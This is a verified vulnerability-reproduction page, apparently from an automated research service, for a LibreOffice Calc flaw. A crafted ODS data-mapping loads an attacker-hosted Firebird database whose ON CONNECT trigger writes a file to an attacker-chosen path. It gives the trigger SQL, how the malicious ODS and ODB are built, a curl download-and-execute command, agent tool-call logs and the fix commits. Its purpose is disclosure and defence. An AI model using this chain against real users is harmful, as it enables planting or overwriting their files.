CVE-2026-63266: Verified Reproduction
CVE-2026-63266: Arbitrary file write via calcext:data-mappings, sql provider and Firebird backup functionality — document-driven write to any user-writable path
CVE-2026-63266 is verified against LibreOffice/core · other. Affected versions: LibreOffice Calc versions prior to 26.2.5 (e.g. 26.2.4.2, last 26.2 release before the fix); 25.x line before 26.8.0 fix lineage. Fixed in 26.2.5. This high reproduction includes runnable sandbox proof, artifacts, and a plain-text agent view under REPRO-2026-00376.
What Is CVE-2026-63266?
CVE-2026-63266 is a high-severity vulnerability affecting LibreOffice/core LibreOffice Calc versions prior to 26.2.5 (e.g. 26.2.4.2, last 26.2 release before the fix); 25.x line before 26.8.0 fix lineage. Pruva has independently reproduced it and publishes a verified, runnable proof-of-concept (reproduction REPRO-2026-00376).
CVE-2026-63266 Severity
CVE-2026-63266 is rated high severity.
High — serious impact or readily exploitable. Prioritize remediation.
Affected LibreOffice/core Versions
LibreOffice/core · other versions LibreOffice Calc versions prior to 26.2.5 (e.g. 26.2.4.2, last 26.2 release before the fix); 25.x line before 26.8.0 fix lineage are affected.
How to Reproduce CVE-2026-63266
pruva-verify REPRO-2026-00376 curl -O https://www.pruva.dev/api/v1/reproductions/REPRO-2026-00376/artifacts/bundle/repro/reproduction_steps.sh && chmod +x reproduction_steps.sh && ./reproduction_steps.sh Proof of Reproduction for CVE-2026-63266
- reached the target end-to-end
- full exploit chain demonstrated
- crash observed
- on the real production code path
- high confidence
- the upstream fix blocks the same trigger
crafted ODS persisting a calcext:data-mapping (provider org.libreoffice.calc.sql, id T@http://127.0.0.1:8379/evil.odb) whose database part resolves to an attacker-hosted ODB containing an embedded Firebird database (ON CONNECT trigger: ALTER DATABASE ADD DIFFERENCE FILE $HOME/CVE-2026-63266_PWNED.marker + BEGIN BACKUP…
- document open (soffice --headless --convert-to ods of crafted ODS)
- calcext:data-mappings restored during load (sc/source/filter/xml/xmlmappingi.cxx)
- org.libreoffice.calc.sql provider refresh
- sdb::DatabaseContext::getByName(name-as-URL)
- HTTP fetch of attacker ODB
- sdbc:embedded:firebird restore+attach without isc_dpb_no_db_triggers
- ON CONNECT database trigger
- Firebird nbackup d…
How the agent worked
Root Cause and Exploit Chain for CVE-2026-63266
LibreOffice Calc restores persisted external data links (calcext:data-mappings) while a
document is being loaded. A crafted ODS can persist an org.libreoffice.calc.sql
data-mapping whose database component resolves to an attacker-hosted .odb document
containing an embedded Firebird database. In affected versions (LibreOffice 26.2.4.2
and earlier 26.2.x), the embedded Firebird driver restores/attaches that database without
isc_dpb_no_db_triggers, so an ON CONNECT database trigger stored in the crafted
database executes during document open. That trigger drives the Firebird nbackup
functionality (ALTER DATABASE ADD DIFFERENCE FILE '<attacker-chosen absolute path>' +
ALTER DATABASE BEGIN BACKUP), which makes the Firebird engine create and write the
nbak difference file at any attacker-chosen location the user can write to — an
arbitrary file write driven purely by opening a document.
- Package/component affected: LibreOffice Calc (sc — external data provider import),
dbaccess (
sdb::DatabaseContext), connectivity Firebird SDBC driver (connectivity/source/drivers/firebird) and the bundled Firebird 3.0.14 engine. - Affected versions: LibreOffice 26.2 series below 26.2.5 (verified on the official
26.2.4.2 Linux x86-64 build, build commit
0229ac93fcf0d7cbc6376066c6f35021cef002dc). - Risk level: high (advisory severity). Consequences: a victim who opens an attacker crafted spreadsheet gets a file written (created/appended, engine page data plus attacker-influenced content such as trigger-inserted rows and the stored target-path header clumplet) to any path the victim user can write — e.g. overwriting a user config file, planting files in auto-started locations, or corrupting user data.
Impact Parity
- Disclosed/claimed maximum impact: "Arbitrary file write to any path the user can
write, driven by a crafted document on open" (advisory CVE-2026-63266; claim
contract expected impact
oob_write). - Reproduced impact from this run: full parity — opening the crafted ODS in the
vulnerable product created a new file at an attacker-chosen absolute user-writable
path (
$HOME/CVE-2026-63266_PWNED.marker, 16 KB+, containing the attacker-chosen target path and attacker-controlled row content), entirely outside LibreOffice's temp/firebird private directories. The fixed product opened the same document through the same path without creating the file. - Parity:
full. - Not demonstrated: this proof stops at the arbitrary file write (the claimed impact). No code execution was attempted and none is claimed by this advisory.
Root Cause
Chain of vulnerable decisions (all corrected in 26.2.5):
- Calc restores external data mappings at load —
sc/source/filter/xml/xmlmappingi.cxx:ScXMLMappingContextinserts thecalcext:data-mapping(providerorg.libreoffice.calc.sql, idT@<database>) and its destructor immediately callsExternalDataSource::refresh(pDoc, true). - The sql provider resolves the database part of the id as a URL —
sc/source/ui/dataprovider/sqldataprovider.cxx→sdb::DatabaseContext::getByName(aDatabase); indbaccess/source/core/dataaccess/databasecontext.cxx, a non-registered name is interpreted as a URL and loaded (loadObjectFromURL), so the crafted ODS pulls the attacker-hosted.odbover HTTP at load time. - The embedded Firebird database is attached without
isc_dpb_no_db_triggers—connectivity/source/drivers/firebird/Connection.cxx(construct): forsdbc:embedded:firebirdthe fbk is restored via the Firebird service manager and the resulting database is attached; the crafted database'sON CONNECTtrigger therefore runs inside the victim's LibreOffice process. - The engine is not confined to a private directory — the bundled Firebird
engine had no
DatabaseAccess = Restrictconfinement, and the nbak difference file paths stored in the database header were not verified againstDatabaseAccess(see LO's bundled-firebird patchexternal/firebird/firebird-nbak-difference-file-access.patch.1: "The difference file opened in openDelta and beginBackup was not verified against DatabaseAccess like the other database file paths"). TheON CONNECTtrigger runsALTER DATABASE ADD DIFFERENCE FILE '<abs path>'+ALTER DATABASE BEGIN BACKUP;BackupManager::beginBackupdoesPIO_create(tdbb, diff_name, ...)at the stored path → a file is created and written at the attacker-chosen location.
Fix commits (all part of LibreOffice 26.2.5 / 26.8.0, present in the verified fixed
build cd7284b4cbbfeb507e630c1aac019f4157393acb and absent from the vulnerable build):
c656bab4c907(cherry-picked asb7c1e1cc355cin 26.2.5) — "firebird: keep each embedded database's files in one directory": gives the driver a private data directory, extracts embedded databases into it and writesfirebird.confwithDatabaseAccess = Restrict <private dir>so an embedded Firebird database can open or create files only inside its own private directory (the advisory's stated fix).736210ff4ced(4c75c4c03577) — "firebird: don't attach a database that is not in the normal backup state" + the bundled nbak difference-fileDatabaseAccesscheck.cc5ac2a8197a(27ba4a9d24cb) — "firebird: don't run an attached database's own event triggers" (isc_dpb_no_db_triggers), blocking the ON CONNECT vector.8cfa628be87f(249c36ad76da) — "firebird: only write back an embedded database that was opened".49c3c4e59c48— "put calc external data mappings under link update control" (the sibling hardening that stops the sql provider from auto-restoring at load).
Reproduction Steps
- Reference:
bundle/repro/reproduction_steps.sh(self-contained; run withbash bundle/repro/reproduction_steps.sh, exit 0 = confirmed). - What the script does:
- Installs the shared-library prerequisites of the official LibreOffice deb binaries and downloads/pins by SHA-256 the official 26.2.4.2 (vulnerable) and 26.2.5.2 (fixed) Linux x86-64 builds plus the Firebird 3.0.14 toolset that matches the engine LibreOffice bundles.
- Crafts the malicious embedded Firebird database with standalone
isql: a table with attacker-chosen rows and anON CONNECTdatabase trigger that executesALTER DATABASE ADD DIFFERENCE FILE '<$HOME/CVE-2026-63266_PWNED.marker>'andALTER DATABASE BEGIN BACKUP, then inserts an attacker-chosen row;gbakproducesevil.fbk(the trigger survives backup/restore — verified). - Builds
crafted/evil.odb(a real Base ODB package declaringsdbc:embedded:firebirdwith our fbk swapped into thedatabase/firebird.fbkstorage element, shape taken fromrepro/ref_odb.zipproduced by the real product) andcrafted/evil.ods(a real Calc ODS package withcalcext:data-mapping xlink:href=http://127.0.0.1:<port>/evil.odb calcext:provider="org.libreoffice.calc.sql" calcext:id="T@http://127.0.0.1:<port>/evil.odb"insideoffice:spreadsheet, shape fromrepro/ref_ods.zip). - Serves
evil.odbfrom a local attacker HTTP server (the attacker-hosted ODB of the advisory's scenario), then runs two vulnerable and two fixed product attempts through the real document-open path (soffice --headless --convert-to ods, fresh-env:UserInstallationprofile per attempt, bounded bytimeout), recording per-attempt transcripts, HTTP access snapshots and the marker file, and writesbundle/repro/runtime_manifest.json.
- Expected evidence of reproduction (observed in both consecutive runs):
- vulnerable attempts:
odb_http_get_requests=2,marker_present=true,marker_contains_target_path=true, soffice exits 134 (product-visible abort after the file write — the write itself already succeeded); - fixed attempts:
soffice_exit_code=0,odb_http_get_requests=0,marker_present=false; - overall verdict
confirmed=true, script exit code 0.
- vulnerable attempts:
Evidence
- Script transcript (both runs):
bundle/logs/reproduction_steps.log - Attempt verdicts:
bundle/repro/attempts-verdict.json - Per-attempt proof (immutable):
bundle/repro/proof/vulnerable-{1,2}/(soffice.log,result.json,marker.bin,marker-strings.txt,attacker-http-snapshot.log) andbundle/repro/proof/fixed-{1,2}/ - Runtime manifest with target identity + artifact hashes:
bundle/repro/runtime_manifest.json(vulnerable target:git:https://github.com/libreoffice/core@0229ac93fcf0d7cbc6376066c6f35021cef002dc; fixed control build:cd7284b4cbbfeb507e630c1aac019f4157393acb) - Key excerpts (second run):
attempt vulnerable-1 result: exit=134 odb_gets=2 marker=PRESENTattempt vulnerable-2 result: exit=134 odb_gets=2 marker=PRESENTattempt fixed-1 result: exit=0 odb_gets=0 marker=absentattempt fixed-2 result: exit=0 odb_gets=0 marker=absent=== verdict: confirmed=True ===proof/vulnerable-1/marker-strings.txtcontains the attacker-chosen absolute target path string stored in the crafted database header.
- Environment: Ubuntu (resolute) x86-64 container, user
vscode; official TDF deb builds of LibreOffice 26.2.4.2 and 26.2.5.2 extracted per-run (not installed); attacker HTTP serverpython3 -m http.serveron 127.0.0.1.
Recommendations / Next Steps
- Upgrade to LibreOffice >= 26.2.5 (or >= 26.8.0). All five hardening commits listed under Root Cause are contained in the fixed build verified by this proof.
- Fix approach (already applied upstream): confine the embedded Firebird engine to a
per-driver private directory with
DatabaseAccess = Restrict, refuse to attach databases in a non-normal nbackup state, verify nbak difference-file paths againstDatabaseAccess, disable database event triggers on attach (isc_dpb_no_db_triggers), and place restored external data mappings under the standard link-update control so the sql provider is not silently re-run at load. - Testing recommendations: add a document-driven regression test that opens an ODS
with an
org.libreoffice.calc.sqldata-mapping pointing at an ODB whose embedded Firebird database carries anON CONNECTtrigger and an nbak difference-file path outside the private directory, asserting that (a) the trigger does not run and (b) no file appears outside the driver's private directory.
Additional Notes
- Idempotency: the script was executed twice consecutively with identical confirmed
results (exit 0 both times). All large downloads are SHA-256-pinned and cached in
$HOME/.cache/pruva-cve-2026-63266; each attempt uses a fresh LibreOffice profile and a fresh marker state. - Edge cases/limitations: (1) the marker path must be user-writable, as the advisory
says ("any location the user could write to"); (2) the vulnerable soffice process
aborts (exit 134, "Unspecified Application Error") after the write because the
trigger leaves the database in the nbak stalled state — the arbitrary write itself
has already happened when the abort occurs, which is visible in the attempt logs;
(3) the HTTP-hosted ODB models the advisory's attacker-hosted database delivery on
loopback; a
file://URL to a local ODB works identically (verified during development) but the HTTP form matches the disclosed attack shape; (4) the bundled engine is Firebird 3.0.14, so the crafted database was built with the matching upstream Firebird 3.0.14 toolset (its fbk ODS format is engine-version specific).
CVE-2026-63266 Reproduction Transcript
The agent's step-by-step process — every tool call, every handoff, the moment the exploit fired.
Full session Replay every step — scrub the timeline or play it back.
ls -la /pruva/project-cache/ 2>/dev/null; echo "---"; ls /pruva/project-cache/repo-mirrors 2>/dev/null; echo "---"; cat /pruva/project-cache/.pruva/cache_manifest.json 2>/dev/null; echo "---"; command -v soffice libreoffice; java -version 2>&1 | head -2; command -v dockertotal 4
drwx------ 4 vscode vscode 80 Oct 5 19:52 .
drwxr-xr-x 3 root root 4096 Oct 5 19:52 ..
drwx------ 2 vscode vscode 60 Oct 5 19:52 .pruva
drwx------ 2 vscode vscode 40 Oct 5 19:52 repo-mirrors
---
---
{ls -la bundle/learning/ 2>/dev/null; ls -la bundle/support/ 2>/dev/null; ls bundle/logs/support bundle/logs/claim_contract 2>/dev/null; cat bundle/ticket.json{"cwd":"/workspace","duration_ms":70,"exit_code":0,"stderr":"","stdout":"total 12\ndrwxr-xr-x 2 vscode vscode 60 Oct 5 19:54 .\ndrwx------ 8 vscode vscode 260 Oct 5 19:54 ..\n-rw-r--r-- 1 vscode vscode 10438 Oct 5 19:54 exploit_knowledge_preflight.json\ntotal 0\ndrwxr-xr-x 2 vscode vscode 40 Oct 5 19:53 .\ndrwx------ 8 vscode vscode 260 Oct 5 19:54 ..\nbundle/logs/claim_contract:\n\nbundle/logs/support:\n{\"claim\":{\"argus_claim_ref\":null,\"attacker_control\":\"Crafted LibreOffice Calc document containing a persisted external data link (calcext:data-mappings) referencing an embedded Firebird database\",\"claimed_surface\":\"viewer_document\",\"expected_impact\":\"oob_write\",\"finding_id\":null,\"id\":null,\"required_entrypoint_detail\":\"Open a crafted LibreOffice Calc document whose saved calcext:data-mappings external data link triggers the sql provider and embedded Firebird backup functionality to write a file to an arbitrary user-writable path\",\"required_entrypoint_kind\":\"open_document\",\"submission_reason\":\"ticket_derived_llm\",\"trigger_class\":\"document_input\",\"upstream_verdicts\":{\"claim_extraction\":{\"confidence\":\"high\",\"model\":\"accounts/fir… [truncated]curl -s "https://api.github.com/repos/libreoffice/core/commits?path=connectivity/source/drivers/firebird&per_page=30" | jq -r '.[] | .sha[0:12] + " " + (.commit.author.date) + " " + (.commit.message | split("\n")[0])' 2>/dev/null | head -40{"cwd":"/workspace","duration_ms":2022,"exit_code":0,"stderr":"","stdout":"b2f721869d1f 2026-09-16T11:19:49Z firebird: size the setBytes grow check by sqllen\nfab67da20949 2026-08-24T20:02:26Z Fix typos\n4dc10d60db52 2026-07-30T13:17:54Z firebird: call writeFile outside the SAL_WARN_IF condition\n09dbbe16b04a 2026-07-28T17:08:38Z firebird: name the modules of a system firebird by absolute path\n99bf52228968 2026-07-28T11:05:37Z Resolves: tdf#172935 Connection from Base to external firebird database refused\nc3f05fb30132 2026-07-17T09:59:00Z Reapply \"firebird: keep each embedded database's files in one directory\"\n23a5d0dc305f 2026-07-15T16:29:57Z Revert \"firebird: keep each embedded database's files in one directory\"\n8cfa628be87f 2026-07-12T13:46:11Z firebird: only write back an embedded database that was opened\n736210ff4ced 2026-07-12T16:09:48Z firebird: don't attach a database that is not in the normal backup state\nc656bab4c907 2026-07-12T12:10:41Z firebird: keep each embedded database's files in one directory\ncc5ac2a8197a 2026-07-12T10:28:48Z firebird: don't run an attached database's own event triggers\nec73986ca7c7 2026-04-29T13:48:30Z tdf#153057 enable Base to filter … [truncated]Artifacts and Evidence for CVE-2026-63266
Scripts, logs, diffs, and output captured during the reproduction.
How to Fix CVE-2026-63266
Upgrade LibreOffice/core · other to 26.2.5 or later.
FAQ: CVE-2026-63266
Is CVE-2026-63266 exploitable?
How severe is CVE-2026-63266?
What type of vulnerability is CVE-2026-63266?
Which versions of LibreOffice/core are affected by CVE-2026-63266?
Is there a fix for CVE-2026-63266?
How can I reproduce CVE-2026-63266?
Is the CVE-2026-63266 reproduction verified?
References for CVE-2026-63266
Authoritative sources for CVE-2026-63266 — official vulnerability databases and the upstream advisory. Pruva's reproduction verifies the issue firsthand; these are the primary records to corroborate it.